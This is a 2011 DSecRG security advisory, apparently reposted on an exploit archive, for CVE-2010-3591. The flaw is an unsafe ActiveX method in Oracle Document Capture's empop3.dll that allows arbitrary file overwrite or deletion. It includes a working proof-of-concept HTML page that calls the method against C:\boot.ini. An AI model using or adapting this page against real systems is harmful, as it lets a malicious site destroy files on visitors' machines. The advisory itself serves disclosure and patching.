Oracle Document Capture empop3.dll Insecure Methods

Application:            Oracle Document Capture
Versions Affected:      Release 10gR3
Vendor URL:             www.oracle.com
Bugs:                   insecure method, File overwriting, File deleting
Exploits:               YES
Reported:               22.03.2010
Vendor response:        31.03.2010
Date of Public Advisory:24.01.2011
CVE-number:             CVE-2010-3591
Author:                 Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
 
 
 
Description
***********
 
Oracle Document Capture contains ActiveX components that contains insecure methods in empop3.dll
 
 
Details
*******
 
 
Oracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}
 
which is contains insecure method "DownloadSingleMessageToFile" that can delete any file in system.
 
Class EasyMailPop3
GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}
Number of Interfaces: 1
Default Interface: IPOP3Main
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
 
 
 
Details
*******
 
Attacker can construct html page which call vulnerable function "DownloadSingleMessageToFile" from ActiveX component empop3.dll
 
Example:
 
<HTML>
         <HEAD>
         <TITLE>DSecRG</TITLE>
         </HEAD>
         <BODY>
          
         <OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>
  
         <SCRIPT>
                  
         function Exploit(){
                 eds.DownloadSingleMessageToFile(1,"C:\\boot.ini",1);                         
         }
         Exploit();
  
         </SCRIPT>
</BODY>
</HTML>
 
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=305
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html



#  0day.today [2018-01-10]  #